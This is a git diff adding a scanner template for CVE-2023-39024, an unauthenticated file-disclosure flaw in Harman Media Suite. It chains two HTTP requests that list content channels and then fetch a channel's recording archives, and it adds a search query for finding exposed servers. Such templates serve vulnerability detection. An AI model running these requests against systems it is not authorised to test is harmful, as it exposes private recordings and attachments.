diff --git a/http/cves/2023/CVE-2023-39024.yaml b/http/cves/2023/CVE-2023-39024.yaml new file mode 100644 index 00000000000..8d7ca44289a --- /dev/null +++ b/http/cves/2023/CVE-2023-39024.yaml @@ -0,0 +1,57 @@ +id: CVE-2023-39024 + +info: + name: Harman Media Suite <= 4.2.0 - Local File Disclosure + author: s4e-io + severity: high + description: | + Harman Media Suite (versions 4.2.0 and below) are vulnerable to possible Local File Disclosure. This allows an unauthenticated user to potentially download attachments and recordings stored within the Media Suite application if anonymous access to the User Portal is enabled. + reference: + - https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC + - https://sploitus.com/exploit?id=C20FE0B5-806A-5687-850C-75D195576B35 + - https://mediasuite.harman.com/channel-store + metadata: + verified: true + max-request: 2 + vendor: harman + product: media-suite + fofa-query: "Harman Media Suite" + tags: cve,cve2023,harman,media-suite,lfi + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"plcm-content-channel", "privacy", "coverImage")' + - 'contains(content_type, "application/vnd.plcm.plcm-content-channel-list+json")' + - 'status_code == 200' + condition: and + internal: true + + extractors: + - type: regex + name: channelId + group: 1 + regex: + - '"channelId":"([^"]+)"' + internal: true + + - raw: + - | + GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"callId", "displayName", "duration")' + - 'contains(content_type, "application/vnd.plcm.plcm-csc+json")' + - 'status_code == 200' + condition: and